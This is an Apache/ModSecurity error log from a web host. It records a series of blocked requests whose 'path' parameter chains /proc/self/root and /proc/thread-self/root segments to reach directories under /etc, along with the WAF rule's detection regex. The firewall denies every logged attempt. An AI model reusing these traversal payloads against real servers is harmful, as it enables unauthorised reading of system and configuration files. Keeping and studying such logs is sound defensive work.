[Mon Mar 16 13:06:38.598259 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.243.203:49720] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqjnjZBu2q05ozVU9aWQAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:39.870204 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.243.203:49732] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqj_9ocpUE4ed4uDzw8QAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:42.075161 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.243.203:45968] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqkv9ocpUE4ed4uDzw8wAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:43.450913 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.243.203:45972] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqkwlT9VtDQc7bgUy1bAAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:44.781364 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.243.203:45974] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqlHjZBu2q05ozVU9aYAAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:50.517119 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.243.203:45976] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqmrABkC4fWIHEf8HtowAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:54.770702 2026] [:error] [pid 21946:tid 140411574073088] [client 74.7.228.16:60572] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgqnXbQATo66fKoS7xSNwAAANQ"]
[Mon Mar 16 13:06:55.839616 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.243.203:40378] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqn9SswJuvopo3lOhhWgAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:07:00.339738 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.243.203:40386] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqpJqj1wV0Si-OkefwTgAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:07:34.743547 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.243.203:40500] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqxo6lpbStxTqkSktuiQAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:07:59.819065 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.243.203:51658] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgq37ysWC90G-1nBrBHZAAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:08:07.716414 2026] [:error] [pid 32654:tid 140411666392832] [client 74.7.243.203:53038] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgq5wlT9VtDQc7bgUy1iQAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:08:13.465369 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.243.203:53054] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgq7Y6lpbStxTqkSktulQAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:08:21.227309 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.243.203:46310] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgq9Zqj1wV0Si-OkefwbAAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:08:23.903089 2026] [:error] [pid 10651:tid 140411708356352] [client 74.7.243.203:60344] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgq97ysWC90G-1nBrBHawAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:08:28.837226 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.243.203:60356] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgq_AlT9VtDQc7bgUy1kAAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:08:30.213209 2026] [:error] [pid 21946:tid 140411540502272] [client 74.7.241.46:34308] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgq_nbQATo66fKoS7xSVQAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:08:33.272178 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.243.203:60366] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgrAZqj1wV0Si-OkefwdAAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:08:34.588785 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.243.203:41854] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgrApqj1wV0Si-OkefwdQAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:08:34.762148 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.241.46:39438] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgrAnbQATo66fKoS7xSWQAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:08:44.195214 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.241.46:39446] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgrDLABkC4fWIHEf8HtygAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:08:54.495331 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.243.203:41870] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgrFpqj1wV0Si-OkefwhgAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
